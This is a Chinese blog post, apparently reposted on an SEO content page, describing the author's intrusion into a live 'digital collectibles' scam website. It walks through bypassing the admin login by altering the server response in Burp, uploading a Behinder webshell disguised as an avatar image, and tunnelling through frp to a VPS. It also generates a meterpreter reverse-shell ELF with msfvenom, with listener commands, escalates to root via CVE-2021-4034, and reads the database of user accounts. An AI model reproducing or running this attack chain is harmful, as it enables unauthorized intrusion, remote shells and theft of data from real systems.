您的位置:首页 > 汽车 > 新车 > 江门做网站公司开网络公司_设计师灵感网站_网站收录查询方法_简述网站推广的方式

江门做网站公司开网络公司_设计师灵感网站_网站收录查询方法_简述网站推广的方式

2024/12/23 2:11:18 来源:https://blog.csdn.net/anquan2233/article/details/144159252  浏览:    关键词:江门做网站公司开网络公司_设计师灵感网站_网站收录查询方法_简述网站推广的方式
江门做网站公司开网络公司_设计师灵感网站_网站收录查询方法_简述网站推广的方式

1662963849_631ed08978891f518b5b8.jpg

看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。
image.png

先打一波poc没有效果,
1662963916_631ed0cc9ae17f5458ede.jpg
访问一下后台直接在url后面加/admin。
1662963987_631ed113d1b4ed472affd.jpg

一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。

1662964173_631ed1cd5084f7bb52a63.jpg

Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。
image.png

1662964271_631ed22f4cba22ac91591.jpg

在爆破之前先发送到Repeater模块发送看看反应。
image.png

用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。

image.png

成功登录后台,这应该是个前端js验证非常的不安全。
1662964536_631ed338786fa7d575623.jpg

尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。

成功上传链接冰蝎马。
1662964573_631ed35dade78a3806e0a.jpg

想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。

./frps -c frps.ini
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eZl49f5T-1663771859261)(https://upload-images.jianshu.io/upload_images/26472780-6ca78873840a2e91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

在内网上的kali进行设置

设置配置文件将8000端口的流量转到kali的6666端口。

启动客户端

./frpc -c frpc.ini

1662964700_631ed3dce7fc84cd35d74.jpg

image.png

生成msf木马ip和端口要填vps的

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=**** LPORT=8000 -f elf > shell.elf

这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。
image.png

打开msf进行监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6666
exploit运行shell.elf

./shell.elf
image.png

成功返回会话。
image.png

使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。
image.png

使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。

git clone

1662964972_631ed4ec861a219e8ded8.jpg

似乎不行卡住了直接上传上去吧。

upload /home/kali/Desktop/CVE-2021-4034  /tmp/进入shellcd /tmpmakechmod 777 cve-2021-4034./cve-2021-4034

返回root权限。

image.png

查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。

image.png

登进入尝试体现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的

在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com